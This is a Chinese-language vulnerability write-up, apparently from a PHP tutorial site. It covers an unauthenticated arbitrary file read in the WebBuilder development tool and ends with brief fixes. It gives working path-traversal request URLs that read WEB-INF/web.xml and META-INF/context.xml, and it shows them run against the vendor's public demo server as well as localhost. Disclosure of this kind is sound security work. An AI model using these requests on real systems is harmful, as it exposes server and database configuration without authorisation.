网站地图    收藏   

主页 > 后端 > 网站安全 >

开源Web应用开发工具WebBuilder任意文件读取及修复

来源:自学PHP网    时间:2015-04-16 23:15 作者: 阅读:

[导读] 开源Web应用开发工具WebBuilder存在任意文件读取漏洞,可泄露服务器及数据库配置等关键信息。代码中存在方法可以由用户控制路径读取文件:查看数据库,调用此方法的xwl不需要登录验...

开源Web应用开发工具WebBuilder存在任意文件读取漏洞,可泄露服务器及数据库配置等关键信息。

代码中存在方法可以由用户控制路径读取文件:

 

1.png



查看数据库,调用此方法的xwl不需要登录验证,没有获取权限的情况下也可以访问:
 

2.png


 

3.png



于是,访问这个URL:

代码读取文件的的路径,是webbuilder/docs/,先尝试访问该文件夹下文件:

http://localhost:8080/wb/main?xwl=13O1AVUENBSF&dir=@index.txt
 

4.png



修改dir参数,没有过滤../,比如提交web.xml路径:

http://localhost:8080/wb/main?xwl=13O1AVUENBSF&dir=@../../WEB-INF/web.xml
 

5.png



再试一个:

http://localhost:8080/wb/main?xwl=13O1AVUENBSF&dir=@../../META-INF/context.xml
 

6.png

在WebBuilder官方的在线使用站上测试一下:


http://www.putdb.com/main?xwl=13O1AVUENBSF&dir=@../../WEB-INF/web.xml
 

7.png



http://www.putdb.com/main?xwl=13O1AVUENBSF&dir=@../../META-INF/context.xml
 

8.png

 

修复方案:

1.过滤../。

2.读取文件时,对目录进行检验。

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论